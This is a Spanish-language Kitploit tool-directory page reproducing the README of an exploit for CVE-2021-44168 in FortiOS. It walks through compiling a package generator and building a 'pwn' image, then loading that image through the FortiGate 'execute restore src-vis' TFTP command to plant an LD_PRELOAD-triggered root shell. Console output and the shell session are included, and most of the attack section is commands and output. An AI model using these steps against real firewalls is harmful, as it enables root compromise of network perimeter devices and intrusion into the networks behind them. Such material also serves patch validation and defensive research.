Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44168 — Una vulnerabilidad de descarga de código sin verificación de integridad en el comando 'execute restore src-vis' de FortiOS anterior a 7.0.3. | Kitploit
Herramientas/GitHubGitHub/0xhaggis/cve-2021-44168
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingDesarrollo de PayloadsExplotación de Binarios
GitHub0xhaggis/cve-2021-44168

CVE-2021-44168

Una vulnerabilidad de descarga de código sin verificación de integridad en el comando 'execute restore src-vis' de FortiOS anterior a 7.0.3.

Ver Repositorio
2122hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para CVE-2021-44168

Propósito

Explotar CVE-2021-44168 para obtener una shell en un firewall Fortigate y habilitar su acceso mediante trucos de LD_PRELOAD que se ejecutan al correr algunos comandos CLI de Fortigate. Obtienes una shell de root.

Uso

Compilar:

root@kitploit:~
gcc -o gen_src-vis_pkg_file gen_src-vis_pkg_file.c -lz

Ejecutar:

root@kitploit:~
% ./gen_src-vis_pkg_file
./gen_src-vis_pkg_file [ -t | -p ] filename.img
  -t            Generate test package, or
  -p            Generate pwn package.
  filename.img  Write to this file.

Modo de prueba

El modo de prueba coloca un archivo llamado pwned.txt en la raíz del sistema de archivos del Fortigate. Crea un paquete de prueba de la siguiente manera:

root@kitploit:~
% ./gen_src-vis_pkg_file -t test.img
[+] Generaing TEST package
[+] Reading test.tar for insertion into package file test.img
[+] Compressing test.tar (10240 bytes)
[+] Compressed size: 115
[+] Build pkg_header
[+] pkg_header crc32: 0x16a384f1
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xe097e419
[+] obj_header crc32: 0xabdfc3cb
[+] Write pkg_header + obj_header + obj_data > test.img
[+] All done. So long and thanks for all the fish!

Modo de explotación

El modo de explotación crea un paquete de payload que coloca una shell en el FortiGate y la habilita mediante trucos de LD_PRELOAD. Para generar el paquete de explotación, ejecuta el exploit de la siguiente manera:

root@kitploit:~
% ./gen_src-vis_pkg_file -p pwn.img
[+] Generaing EXPLOIT package
[+] Reading pwn.tar for insertion into package file pwn.img
[+] Compressing pwn.tar (16465920 bytes)
[+] Compressed size: 6843825
[+] Build pkg_header
[+] pkg_header crc32: 0xd657d879
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xf373554b
[+] obj_header crc32: 0x3a7fdcd7
[+] Write pkg_header + obj_header + obj_data > pwn.img
[+] All done. So long and thanks for all the fish!

Usando el paquete malicioso para obtener una shell de root

Desde la CLI de administración del FortiGate:

root@kitploit:~
FortiGate # execute restore src-vis tftp pwn.img 192.168.100.1
This operation will overwrite the current source visibility signatures!
Do you want to continue? (y/n)y

Please wait...

Connect to tftp server 192.168.100.1 ...
######

Get source visibility signatures from tftp server OK.
upd_manual_cid[255]-Updating src-vis plugin
doInstallUpdatePackage[981]-Full obj found for CIDB000
doInstallUpdatePackage[991]-Updating obj CIDB
installUpdateObject[323]-Step 1:Unpack obj 29, Total=1, cur=0
installUpdateObject[352]-Step 2:Prepare temp file for obj 29
installUpdObjRest[637]-Step 5:Backup /etc/cid.tar.gz->/tmp/update.backup
installUpdObjRest[651]-Step 6:Copy new object /tmp/updPiMCON->/etc/cid.tar.gz
installUpdObjRest[731]-Step 7:Validate object
installUpdObjRest[755]-Step 8:Re-initialize using new obj file
installUpdObjRest[767]-Step 9:Delete backup /tmp/update.backup
cid svr 13 req 4
__update_status[1181]-CIDB000 installed successfully
upd_status_save_status[114]-try to save on status file
upd_status_save_status[179]-Wrote status file
upd_manual_cid[284]-Update successful
./../../../../../data2/bfbin/rdate: Cannot create symlink to '/data2/bfbin/busybox'Error exit delayed from previous errorsupd_cfg_extract_unpacked2
upd_cfg_extract_cid_db_version[554]-version=06000000CIDB00000-00000.00000-0101010000
cid could not install sigs: version failed

FortiGate #

En este punto tendrás una shell accesible mediante LD_PRELOAD en comandos CLI que ejecutan procesos en Linux. Una forma de activar la shell recién obtenida:

root@kitploit:~
# fnsysctl ls
/ # 
/ # export PATH=/data2/bfbin:/bin
/ # uname -a
Linux FortiGate 3.2.16 #2 SMP Thu Mar 28 02:54:46 UTC 2019 x86_64 GNU/Linux

Informe de la vulnerabilidad

Pendiente. Por ahora, lee el código.

Descargar herramienta